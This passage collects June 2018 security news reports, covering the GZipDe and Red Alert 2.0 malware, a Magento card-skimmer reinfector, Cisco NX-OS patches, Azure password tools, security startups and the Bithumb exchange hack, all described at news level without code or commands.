At the time it is not possible to attribute the malicious code to a specific actor, VirusTotal doesn’t share information about the source of the upload and the target of the attack was not disclosed, the researchers were only able to analyze the sample.

“It seems very targeted,” Chris Doman, a security researcher with AlienVault told Bleeping Computer. “Given the decoy document is in English and uploaded from Afghanistan, it may have been targeting someone in an embassy or similar there.”

The malicious code was a multi-stage malware, the attack chain starts with a spear-phishing message spreading the weaponized Word document, the final goal appears to be the delivery of a Metasploit backdoor.

“This is the first step of a multistage infection in which several servers and artifacts are involved. Although the final goal seems to be the installation of a Metasploit backdoor, we found an interesting .NET downloader which uses a custom encryption method to obfuscate process memory and evade antivirus detection.” reads the report published by Alien Vault.

The document was designed to trick victims into enabling macros, which then executes a Visual Basic script stored as a hexadecimal stream, and executes a new task in a hidden Powershell console which downloads a PE32 executable. The ultimate step consists of the delivery of the GZipDe malware.

GZipDe 

The GZipDe downloader was written in .NET, and implements a custom encryption method to obfuscate process memory and evade antivirus detection.

While investigating the GZipDe downloader the experts noticed that the server used to store the payloads that were fetched by the malware was down.

Further investigation allowed AlienVault to find information about the server on the Shodan search engine that had indexed it and recorded it serving a Metasploit backdoor.

“The payload contains shellcode that contacts the server at 175.194.42[.]8. Whilst the server isn’t up, Shodan recorded it serving a Metasploit payload:”

“The server, 175.194.42[.]8, delivers a Metasploit payload. It contains shellcode to bypass system detection (since it looks to have a valid DOS header) and a Meterpreter payload – a capable backdoor. For example, it can gather information from the system and contact the command and control server to receive further commands.”

The shellcode loads the entire DLL into memory, it is a fileless malware that could allow attackers to transmit any other payload in order to acquire elevated privileges and perform lateral movements within the local network.

The choice of Metasploit is not a novelty, APT groups like Cobalt Strike and CopyKittens adopted it in their campaigns to make hard the attribution of their attacks.

Technical details including IoCs are reported in the analysis published by AlienVault.


Cyber Intelligence Firm Intsights Raises $17 Million
22.6.2018 securityweek  IT

Israel-born startup Intsights Cyber Intelligence has raised $17 million in a Series C funding round led by Tola Capital. It brings the total capital raised by the firm to $41.3 million ($1.8 million seed funding in 2015; $7.5 million Series A in 2016; and $15 million Series B in 2017).

"This new round of funding," commented CEO Guy Nizan, "will fuel further investment in our cyber reconnaissance capability and global expansion, allowing us to bring the power of tailored intelligence to enterprises around the globe."

The firm was founded in Israel in 2015 by Alon Arvatz, Gal Ben David, Guy Nizan. All three are veterans of the elite cyber-warfare and intelligence services of the Israel Defense Forces (IDF). Intsights is now headquartered in New York, NY.

Intsights Cyber Intelligence is predicated on the idea that effective defense begins before an attack is launched. By definition, most traditional security controls are reactive. They attempt to recognize an attack at the perimeter and block it, or an existing incursion and mitigate it. But also by definition, reactive controls are after the event: the attack is in progress or has already succeeded.

Intsights seeks to be proactive -- to recognize and mitigate an attack before it occurs. It does this by crawling both the surface and dark web looking for indications that an attack is being planned by a hacker or criminal gang. Clues can include actions like scouting targets, using suspicious tools, and collaborating with other hackers on underground forums. The Intsights platform then goes further by integrating with many of the most popular security controls, automatically updating the security infrastructure to block or mitigate the budding attacks it discovers.

Intsights has 15 strategic partners, including firms like Splunk, Check Point, Palo Alto, Carbon Black, Fortinet, IBM, Microsoft, LogRhythm (now majority-owned by investment firm Thoma Bravo), and Symantec.

"Cyber-attacks are driven by humans who leave footprints and breadcrumbs as they plan their attack," explains Nizan. "Enterprises need tailored intelligence that looks beyond the firewall to see the indicators of attack their cyber adversaries leave and understand how, why and when they plan to attack."

Sheila Gulati, managing director of investment firm Tola Capital, expands: "Traditional threat intelligence solutions have failed to deliver the advantage promised to enterprise customers and their security teams. Today, CISOs want to understand what risks are coming and take a proactive stance, as well as determine what sensitive assets are already exposed. By leveraging a data and software enabled approach, security teams can prepare for upcoming attacks and prevent future attacks."

Of course, corporate risk isn't limited to the attack itself. Risk also comes from fake mobile applications, phishing sites, pastebin posts, social media pages, and malicious domains. These can be discovered by Intsight's web-crawling algorithms -- and the platform allows them to be remediated with a single click. "This is done," says Intsights, "via integration with social media platforms, app stores, and registrars by engaging with the IntSights External Remediation team."

The firm already has 20 of the Fortune Global 500 enterprises among its customers, from the financial services, automotive, telecom, apparel, and gaming industries. This customer base is growing at more than 200%. Intsights has offices in Amsterdam, Tokyo, Singapore, Dallas, and Boston and 40 reseller partners worldwide.


Microsoft Combats Bad Passwords With New Azure Tools
22.6.2018 securityweek Security 

Microsoft this week announced the public preview of new Azure tools designed help its customers eliminate easily guessable passwords from their environments.

Following a flurry of data breaches in recent years, it has become clear that many users continue to protect their accounts with weak passwords that are easy to guess or brute force. Many people also tend to reuse the same password across multiple services.

Attackers continually use leaked passwords in live attacks, Verizon’s 2017 Data Breach Investigations Report (DBIR) revealed, and Microsoft banned commonly used passwords in Azure AD a couple of years ago.

Now, the company is taking the fight against bad passwords to a new level, with the help of Azure AD Password Protection and Smart Lockout, which were just released in public preview. These tools should significantly lower the risk of compromise through password spray attacks, Alex Simons, Director of Program Management, Microsoft Identity Division, says.

The new Azure AD Password Protection allows admins to prevent users from securing accounts in Azure AD and Windows Server Active Directory with weak passwords. For that, Microsoft uses a list of 500 most used passwords and over 1 million character substitution variations for them.

Management of Azure AD Password Protection is available in the Azure Active Directory portal for Azure AD and on-premises Windows Server Active Directory and admins will also be able to specify additional passwords to block.

To ensure users don’t use passwords that meet a complexity requirement but are easily guessable, or engage into predictable patterns if required to change their passwords frequently, organizations should apply a banned password system when passwords are changed, Microsoft says.

“Today’s public preview gives you both the ability to do this in the cloud and on-premises—wherever your users change their passwords—and unprecedented configurability. All this functionality is powered by Azure AD, which regularly updates the database of banned passwords by learning from billions of authentications and analysis of leaked credentials across the web,” Simons notes.

With Smart Lockout, Microsoft wants to lock out bad actors trying to guess users’ passwords. Leveraging cloud intelligence, it can recognize sign-ins from valid users and attempts from attackers and other unknown sources. Thus, users can remain productive while attackers are locked out.

Designed as an always-on feature, Smart Lockout is available for all Azure AD customers. While its default settings offer both security and usability, organizations can customize those settings with the right values for their environment.

By default, all Azure AD password set and reset operations for Azure AD Premium users are configured to use Azure AD password protection, Simons says. To configure their own settings, admins should access Authentication Methods under Azure AD Active Directory > Security.

Available options include setting a smart lockout threshold (number of failures until the first lockout) and duration (how long the lockout period lasts), choosing banned password strings, and extending the banned password protection to Windows Server Active Directory.

Organizations can also download and install the Azure AD password protection proxy and domain controller agents in their on-premises environment (both support silent installation), meaning that they can use Azure AD password protection across Azure AD and on-premises.


Google Marks APKs Distributed by Google Play
22.6.2018 securityweek Android

Google this week announced that it is adding a small amount of security metadata on top of APKs distributed by Google Play in order to verify their authenticity.

Initially announced in December 2017, the new change is designed to verify product authenticity from Google Play and is accompanied by an adjusted Google Play maximum APK size to take into account the small metadata addition.

The metadata is meant to work similarly as the official labels or badges that manufacturers place on physical products to mark their authenticity. The metadata will signify Play’s badge of authenticity for all Android apps distributed through the official marketplace.

“One of the reasons we're doing this is to help developers reach a wider audience, particularly in countries where peer-to-peer app sharing is common because of costly data plans and limited connectivity,” James Bender, Product Manager, Google Play, says.

According to Bender, the new “badge” will help determine the app authenticity for apps obtained through Play-approved distribution channels when the device is offline. These shared apps will be added to a Play Library and app updates management will be possible when the device has connectivity.

“This will give people more confidence when using Play-approved peer-to-peer sharing apps,” he notes.

Developers are also expected to benefit from this change, not only because a Play-authorized offline distribution channel will be available for them, but also because, once the peer-to-peer shared apps are added to the Play library, they become eligible for updates from Play.

Google says no action is required from the developers or from the users of their applications. The small metadata addition is inserted into the APK Signing Block and is expected to improve the integrity of Google Play's mobile app ecosystem.

Beginning in August 2018, developers will need to target API level 26 (Android 8.0) or higher with their new apps. Starting November this year, app updates will have to comply to this requirement as well. Existing applications that don’t receive updates won’t be affected by these changes.


Cisco Patches Critical Flaws in NX-OS Software
22.6.2018 securityweek
Vulnerebility

Cisco on Wednesday released patches for more than 30 security vulnerabilities in its products, including Critical flaws impacting NX-OS Software.

A total of five Critical arbitrary code execution vulnerabilities were addressed with this set of security patches, impacting the NX-API feature of NX-OS Software (CVE-2018-0301) and the Fabric Services component of FXOS Software and NX-OS Software (CVE-2018-0308, CVE-2018-0304, CVE-2018-0314, and CVE-2018-0312).

The bugs can be exploited by unauthenticated, remote attackers to cause a buffer overflow, execute arbitrary code (as root, in some cases), cause a denial of service (DoS) condition, or read sensitive memory content on an affected device.

The bugs impact multiple devices, including Nexus 3000 Series Switches to Nexus 9000 Series Switches in standalone NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules, Firepower 4100 and Firepower 9300 products, UCS 6100 to UCS 6300 Series Fabric Interconnects, and MDS 9000 Series Multilayer Switches.

Cisco also addressed High risk vulnerabilities impacting NX-OS Software and FXOS Software, affecting Nexus 4000 Series Switch, Nexus 3000 and 9000 Series, and Firepower 4100 Series and Firepower 9300 Security Appliance.

The issues affecting NX-OS include command-injections in the CLI and NX-API, denial of service (DoS) in the Simple Network Management Protocol (SNMP) input packet processor, elevation of privilege in role-based access control (RBAC), remote code execution and DoS in the Internet Group Management Protocol (IGMP) Snooping feature, DoS in the Border Gateway Protocol (BGP) implementation, elevation of privilege in NX-API.

Flaws also affecting FXOS Software include unauthorized administrator account in the write-erase feature, DoS conditions in the Discovery Protocol (formerly known as CDP) subsystem and Cisco Fabric Services component, and arbitrary code execution in the Cisco Discovery Protocol component.

Issues affecting only FXOS Software include an arbitrary code execution vulnerability in the CLI parser and a denial of service bug in the web UI.

Additionally, Cisco patched DoS flaws in the SNMP feature of the Cisco Nexus 4000 Series Switch and in the implementation of a specific CLI command and the associated SNMP MIB for Cisco Nexus 3000 and 9000 Series Switches.

A path traversal vulnerability was resolved in the process of uploading new application images to the Cisco Firepower 4100 Series Next-Generation Firewall (NGFW) and Firepower 9300 Security Appliance.

As part of this set of security updates, Cisco also addressed 10 Medium risk flaws in TelePresence Video Communication Server (VCS) Expressway, Unified Communications Manager IM & Presence Service (formerly CUPS), NX-OS Software, NVIDIA TX1 BootROM, Meeting Server, Firepower Management Center, 5000 Series Enterprise Network Compute System and Unified Computing (UCS) E-Series Servers, and AnyConnect Secure Mobility Client for Windows Desktop.

Software updates were released for the vulnerable products. Cisco customers with valid licenses are advised to upgrade to an appropriate release. Details on the resolved vulnerabilities and the affected products and devices are available on Cisco’s website.


Red Alert 2.0 Android Trojan available for rent in the underground at $500 per Month
22.6.2018 securityaffairs Android

According to researchers at Trustwave, the source code of the Red Alert 2.0 Android Trojan is now available for rent on cybercrime underground forums at $500 per month.
The experts discovered the latest variant because received a malicious apk via mail and analyzed it.

“It all started with a spam message, which curiously had an Android App attachment. The spam email vaguely claims that the attachment was a dating app for finding anonymous sex-acquaintances called SilverBox.” reads the analysis published by Trustwave.

“We Googled some of the strings from the decompiled source code and found this bot was known as RED ALERT v2.0 BOT and is being rented out for at least $200 for 7 days test usage, $500 for a month and up to $999 for 2 months.”

The Red Alert 2.0 Android Trojan was being distributed through spam messages, the detection rate at the time of analysis was 25 out of 59 of the VirusTotal anti-virus solutions.

The Red Alert 2.0 Android Trojan was first spotted in September by researchers at security firm SfyLabs, it was being offered for rent on many dark websites for $500 per month.

The Red Alert 2.0 Android banking malware was developed from scratch and has been offered for rent via many online hacking forums. The authors of the malware are continuously updating it, adding new features.

Red Alert 2.0 banking Trojan

The malware implements a broad range of stealing abilities, it is capable to exfiltrate information from the infected mobile devices, such as contact details and SMS messages. The malware is able to block calls from banks and it implements a backup C&C mechanism through bots via Twitter.

C&C communications are via HTTP POST requests to a specific UR, in case the C&C is not available, the malicious code receives instructions from the operator through a Twitter message.

The malware also displays an overlay on the top of legitimate apps, at the time of its first discovery experts observed around 60 HTML overlays for banking apps.

According to the Trustwave, the authors have expanded this capability and currently the Red Alert 2.0 Android Trojan is able to target more than 120 banks in Australia, Austria, Canada, Czech Republic, Poland, Denmark, Germany, France, Lithuania, India, Italy, Ireland, Japan, New Zeeland, Romania, Spain, Sweden, Turkey, United Kingdom, and the United States.

The authors’ adv also claims that the malware is able to target popular payment systems (PayPal, Airbnb, Coinbase, Poker Stars, Neteller, Skrill, and Unocoin Bitcoin Wallet India) and CC+VBV Grabbers (Amazon, eBay, LINE, GetTaxi, Snapchat, Viber, Instagram, Facebook, Skype, UBER, WeChat, and WhatsApp) too.

Red Alert 2.0 is able to intercept and send SMS messages, launch APKs and inject HTML, this latter feature could be customized on demand. The author claims to produce new updates every two weeks.

The malware uses a number of services to handle it life cycle and keep it running at all times, some of them are:

WatchDogService: sets timers to ensure that malware is running periodically.
ControlService: registers the device bot, as well as starting up the ReadCommandThread: waits for instructions from the C&C server
Ensures that device is connected to the C&C server
BootReceiver: ensures all functionality is up and running when machine is rebooted. This boot receiver ensures that the watchdog service is run every 10 secs or 30 secs depending on the version of the OS.
SmsReceiver: intercepts SMS messages.
The Red Alert 2.0 also includes a UI module used to request for permissions from the victims and to overlay some templates received from the C&C server on top of other apps.

red alert

Below a video published by the researchers that shows the malware in action:

Are you curious?

Well, you can rent the malware starting at $200 for 7 days, $500 for a month, or $999 for 2 months.

Let’s close with a consideration, the method to spread an Android malware via spam messages is not effective and it is rare to see crooks spreading malicious Android apps in this way as confirmed by the experts.

“To wrap-up, we had fun reverse engineering this Android malware and learned a lot. It was interesting to see APK malware being spammed via email, but we wonder how effective the strategy really is for the bad guys.” concludes Trustwave.

“The malware required the user to OK to install, and Android pops up plenty of warnings about permissions. Also, Google Play Protect was detecting this threat, so in order to get the malware installed on Android we also had to disable Play Protect. We haven’t seen any more samples being spammed, so perhaps the email campaign was not so successful after all.”


Magento credit card stealer Reinfector allows reinfect sites with malicious code
22.6.2018 securityaffairs
Virus

Cybercriminals used the ‘credit card stealer reinfector’ to reinfect the websites and continue to steal personal and financial data.
Researchers at Sucuri reported crooks are using a very simple evasion technique to reinfect Magento websites after their malicious code has been removed.

Cybercriminals have devised a method to hide the malicious code, the ‘credit card stealer reinfector’, used to reinfect the websites and continue to steal personal and financial data.

The credit card stealer reinfector is hidden inside the default configuration file (config.php) of Magento installs, it is included on the main index.php and is loaded with every page visited by the users, this process ensures that the code is re-injected into multiple files of the website.

Researchers highlighted that the config.php file is automatically configured during the installation of the Magento instance and usually administrators or website owners don’t change it.

“This code is a prime candidate for infections once it is included right on the main index.php, loading at every page.” reads the analysis published by the experts.

“On the first block, we have a function called “patch” that writes content into a file (patching it). This function is then called to write externally obtained content into specific files related to the payment process or user control:

/app/code/core/Mage/Payment/Model/Method/Cc.php
/app/code/core/Mage/Payment/Model/Method/Abstract.php
/app/code/core/Mage/Customer/controllers/AccountController.php
/app/code/core/Mage/Customer/controllers/AddressController.php
/app/code/core/Mage/Admin/Model/Session.php
/app/code/core/Mage/Admin/Model/Config.php
/app/code/core/Mage/Checkout/Model/Type/Onepage.php
/app/code/core/Mage/Checkout/Model/Type/Abstract.php
The malicious code also obfuscates external links in a way that a simple variable replacement and base64 decoding can read it”

The malicious code was stored on Pastebin, this choice allows attackers to remain under the radars.

Experts pointed out that the reinfector code they analyzed is able to bypass security scanners.

“The mechanism the attackers add “error_reporting(0);”is very interesting. It avoids any error leading to the discovery of the infection.” states the post.

The patch() function is used to inject the malicious code for stealing confidential information into Magento files, it uses 4 arguments (The path of a folder, the name of a file stored in that path needs to be infected, file size that is used to check if it is necessary to reinfect the given file, a new file name to be created, and the remote URL from which the malicious code will be downloaded.

Experts noticed that the base64_decode() function is split in multiple parts to evade detection from security scanners.

“As a rule of thumb, on every Magento installation where a compromise is suspected to have taken place, the /includes/config.php should be verified quickly. We advise you to do it first thing. Many times, removing just the infection that you have a main concern about is not enough. You should always assume someone is out there ready to catch you off guard.” conclude the researchers.


Cisco security updates address five critical issues in NX-OS Software
22.6.2018 securityaffairs
Vulnerebility

Cisco released security patches for more than 30 vulnerabilities, including five Critical arbitrary code execution issues affecting the NX-OS Software
Cisco released security patches for more than 30 vulnerabilities including five Critical arbitrary code execution issues affecting the NX-API feature of NX-OS Software (CVE-2018-0301) and the Fabric Services component of FXOS Software and NX-OS Software (CVE-2018-0308, CVE-2018-0304, CVE-2018-0314, and CVE-2018-0312).

The vulnerabilities can be remotely exploited by unauthenticated attackers to trigger a buffer overflow and execute arbitrary code (as root, in some circumstances), cause a denial of service (DoS) condition, or read sensitive memory content on vulnerable devices.

According to CISCO, many devices are affected by the critical vulnerabilities, including Nexus 3000 Series Switches to Nexus 9000 Series Switches in standalone NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules, UCS 6100 to UCS 6300 Series Fabric Interconnects, Firepower 4100 and Firepower 9300 products, and MDS 9000 Series Multilayer Switches.

Security updates also address High-risk vulnerabilities affecting NX-OS Software and FXOS Software, affecting Nexus 4000 Series Switch, Nexus 3000 and 9000 Series, and Firepower 4100 Series and Firepower 9300 Security Appliance.

The vulnerabilities affecting NX-OS include:

command-injections in the CLI and NX-API;
denial of service (DoS) in the Simple Network Management Protocol (SNMP) input packet processor;
elevation of privilege in role-based access control (RBAC);
remote code execution and DoS in the Internet Group Management Protocol (IGMP) Snooping feature;
DoS in the Border Gateway Protocol (BGP) implementation;
elevation of privilege in NX-API;
CISCO NX-OS Software

Security updates issued by Cisco also addressed DoS flaws in the SNMP feature of the Cisco Nexus 4000 Series Switch and in the implementation of a specific CLI command and the associated SNMP MIB for Cisco Nexus 3000 and 9000 Series Switches.

Further details on the vulnerabilities and the affected products are available on Cisco Security Advisories and AlertsCisco Security Advisories and Alerts page.


6 Security Flaws in Smart Speakers You Need to Know About
22.6.2018 securityaffairs Security

Connectivity and functionality may offer us convenience, but as with any new connected technology like smart speakers also come with security concerns.
How would you feel about having a device in your home that’s always listening to what’s going on, standing ready to record, process and store any information it receives? That might be a somewhat alarmist way of putting it, but it’s essentially what smart home speakers do.

Smart speakers offer audio playback but also feature internet connectivity and often a digital assistant, which dramatically expands their functionality.

With today’s smart speakers, you can search the internet, control other home automation devices, shop online, send text messages, schedule alarms and more.

This connectivity and functionality may offer us convenience, but as with any new connected technology, these speakers also come with security concerns. Any time you add a node to your network, you open yourself up to more potential vulnerabilities. Since smart home tech is still relatively new, it’s also bound to have bugs.

Although smart home companies work to fix these flaws as quickly as possible and want to ensure their devices are secure, there’s still always a chance you’ll run into security issues. Here are six potential risks you should be aware of.

Unexpected Activation
Although smart speakers are always listening since their microphones are continuously on, they don’t record or process anything they hear unless they detect their activation phrase first. For Google Home, this phrase is “OK, Google.” For an Amazon speaker, say “Alexa.”

There are several problems. The first is that the technology isn’t perfect yet, and it’s entirely possible that the device will mishear another phrase as it’s wake-up phrase. For example, an Oregon couple recently discovered that their Amazon Echo speaker had been recording them without their knowledge. Amazon blamed the mistake on the device mishearing something in a background conversation as “Alexa.”

Misheard Cues
Unfortunately, these misunderstandings can extend beyond just activation. After the Oregon family’s Echo recorded their conversation, it sent the recording to a random person on their contact list. They only knew about the incident because the person who received the recording contacted them and told them.

Amazon offered the same explanation for this part of the event. According to the company, the speaker misheard the background conversation as a whole string of commands, resulting in sending the discussion to the couple’s acquaintance. This situation suggests that these speakers’ listening skills might not be as advanced as they need to be to function properly.

Unwanted Interaction From Ads
Smart speakers may misunderstand cues and unexpectedly wake up, but people could also purposefully wake them without your permission. Once they do so, they could potentially gain access to some of your information.

Burger King demonstrated this vulnerability when it ran an ad that purposely activated Google Home speakers and prompted them to read off a description of the Whopper burger. Google reacted quickly and prevented the devices from responding. Burger King fired back by altering the ad so that it triggered the speakers again.

While this prank might be relatively harmless, people could also potentially activate your speaker without your permission, even by yelling through your front door or an open window. Because of this vulnerability, you should avoid using a smart speaker for things like unlocking your front door. You can also change the wake word and set up pins for specific features.

Smart Speakers

Hacks and Malware
Thus far, most of the reports of problems with smart speakers have revolved around unauthorized access or faulty functionality. The devices are certainly also vulnerable to malicious hacks as well.

Security experts in the tech realm have already discovered various susceptibilities, enabling companies to fix them. Hackers may at some point, however, find some of these vulnerabilities first. If they do, they may be able to access sensitive personal information.

To protect yourself from becoming a victim of a hacking incident, use hardware and software only from companies you trust. Also, use secure passwords, and change them often wherever you can.

Voice Hacks
Using smart speakers could also increase your vulnerability to voice hacks, a subset of identity theft in which someone obtains an audio recording of your voice and uses it to access your information. Once they have this recording, they use it to trick authentication systems into thinking they’re you. This hack is a potential way to get around smart speakers’ voice recognition capabilities.

Smart home speakers provide a potential goldmine of audio recordings that someone could use for voice hacking. If a bad actor manages to hack into the speaker or cloud service where your records get stored, they could use it to hack into various accounts of yours.

Storage of Your Data
The fact that some cloud service is storing these recordings may make users uncomfortable. These recordings may be used to personalize your experience, improve the smart assistant’s effectiveness, serve you ads or do a range of other things.

Luckily, you can delete these recordings if you’d like through your account settings. In addition, advocates have called for more transparency about how these companies use customer data.

Be Smart About Using Smart Speakers

All smart technology comes with security risks. That doesn’t necessarily mean we shouldn’t use it, but it does mean we should be careful about how we use it and take appropriate security measures.

If you choose to get a smart speaker, take the time to set up your security settings, and allow access only to people and companies you trust.


NanoLock Launches Platform to Protect IoT Devices From Production Through End-of-Life
21.6.2018 securityweek IoT 

Cybersecurity start-up NanoLock Security today announced a new lightweight security platform designed to add security into the small connected devices better known as the internet of things, rather than to overlay security around those devices.

This is security designed to safeguard small devices from the production line through to the end of life and beyond; to allow secure updates but to prevent hacking and tampering; and to ensure the integrity of data from the device outwards.

"The challenge for connected devices," co-founder and CEO Eran Fine told SecurityWeek, "is that about 90% have very low computing power -- and they are becoming the most vulnerable part of the ecosystem. How do you protect those low power, and low compute power devices where an attacker may have network or physical access? The attacker may come from the device-side, or the cloud-side, on the production line, or even at the end of life of the device. How do you protect the very low computing power device within a cost and performance structure that satisfies the connected device marketplace?"

He needed a solution or architecture that is CPU agnostic. "CPUs are hackable -- as Intel, ARM and AMD have recently demonstrated," he continued. "So we work on the assumption that CPUs are untrustworthy. Instead of developing security that uses the device's own CPU, we've created something that sits between the bus of the device and the non-volatile memory. This acts as a governing entity, and very aggressively allows or disallows other entities to read from or write to the non-volatile memory that holds the firmware, the boot image, and the critical applications."

This approach works by preventing overwriting, modification, manipulation, erasure and ransomware attacks on firmware, boot images, system parameters and critical applications in connected and IoT devices. Without any possible access to the firmware, hackers cannot gain access to the firmware and cannot, for example, recruit the device into the next big Mirai-style IoT botnet.

Three technologies lie at the heart of the architecture. OREN device-side embedded protection safeguards against attacks from the network and cloud, and even an attacker that has physical access to the device. FOTALock technology ensures the safe and trusted delivery of firmware-over-the-air (FOTA) updates, applications and critical parameters. Management of Things (MoT) controls and manages devices and includes features for monitoring device security, version management, attacks and alerts. MoT is deployed as a stand-alone solution or integrated into a customer's own security management platform.

Since NanoLock sits on the only data route into the device, and is placed there during manufacture or assembly, connected devices cannot be hacked. "Even if you are the device owner, even if you have all the highest privileges, even if you are on the production line and have access to the device -- the security camera or the router, or the ECU in a car -- you cannot write any malicious code into the firmware, into the memory holding the firmware. The only entity that can do this is someone who has created a root of trust and a root of integrity between the protected memory and the entity," explains Fine.

"The protected memory will always continue to protect because it has autonomous decision-making power -- it has its own tiny CPU, its own non-volatile memory, its own cryptographic engine. Even if you are hacking the CPU or hacking the cloud, this device will continue to protect itself and the cloud-to-device integrity." Furthermore, he continued, "Every device, on inception, registers itself, provisions itself, and protects itself in front of the cloud -- and once it does this, it is unbreakable and unclonable."

The result is device security from the production line through distribution, installation and use, to beyond end of life. NanoLock provides physical protection from rogue or corrupt employees on the production line or in the business, and from hackers during use. "I like that NanoLock is combining a cyber and cyber-physical approach to protect and manage devices from the production line through end of life," comments Chris Wilder, senior analyst at Moor Insights & Strategy.

Such an architecture cannot be sold to the end user for installation since it is an integral part of the connected device itself. "We don't sell to device users like Citibank or Bank of America," said Fine; "but we will sell to a car maker or a big manufacturer of security cameras, or very large cloud providers offering management of devices as a service. Our customers are the automotive OEMs, operators and device makers and to some extent the large systems integrators."

It's a top down, not a bottom up approach to distribution. "We have strategic relationships with the memory makers," he said. "We work with one in Taiwan, one in the US and one in Japan. This provides an early access to the device makers who spec us in to the manufacture."

"Connected cars, part of the IoT ecosystem, are an area where security vulnerabilities are life-critical," comments Takayuki Maruhashi, assistant director at Japan-based Techno Systems Research. "A solution like NanoLock's ensures the network of ECUs are fully protected and managed during operation and during the component update process. CPU protection is proven to be vulnerable and NanoLock's approach is the solution to this problem."

And it's not just business to business critical infrastructure scenarios, added Fine. "The unbreakable nature of the system also makes it attractive for military and intelligence purposes where the device needs to be protected even if it falls into the wrong hands."

Based in both Nitzanei Oz, Israel and New York, NanoLock Security was founded in 2016 by Eran Fine, Shlomo Oren and Erez Kreiner; and is another start-up ultimately born from the Israeli intelligence services conveyor belt. Kreiner was director of Israel's National Cyber Security Authority for more five years, and was responsible for preventing cyber-attacks on Israel's critical infrastructures and assets.


Hackers Steal $30 Million From Top Seoul Bitcoin Exchange
21.6.2018 securityweek  Cryptocurrency

Hackers stole more than $30 million worth of cryptocurrencies from South Korea's top bitcoin exchange, sending the unit's price falling around the world on Wednesday.

The virtual currency was priced at $6,442 dollars late afternoon in Seoul, down about 4.4 percent from 24 hours earlier, after the latest attack on Bithumb raised concerns over cryptocurrency security.

Hyper-wired South Korea has emerged as a hotbed of trading in virtual units, at one point accounting for some 20 percent of global bitcoin transactions -- about 10 times the country's share of the global economy.

Bithumb, which has more than 1 million customers, is the largest virtual currency exchange in the South.

"It has been confirmed that virtual currencies worth 35 billion won ($32 million) was stolen through late night yesterday (Tuesday) to early morning today," the exchange said in a statement.

All deposits and withdrawals were suspended indefinitely to "ensure security", it said, adding the losses would be covered from the firm's own reserves.

It was the second major attack on South Korean virtual currency exchanges in just 10 days, after hackers stole 40 billion won from Seoul-based Coinrail, which suspended withdrawal and deposits services since then.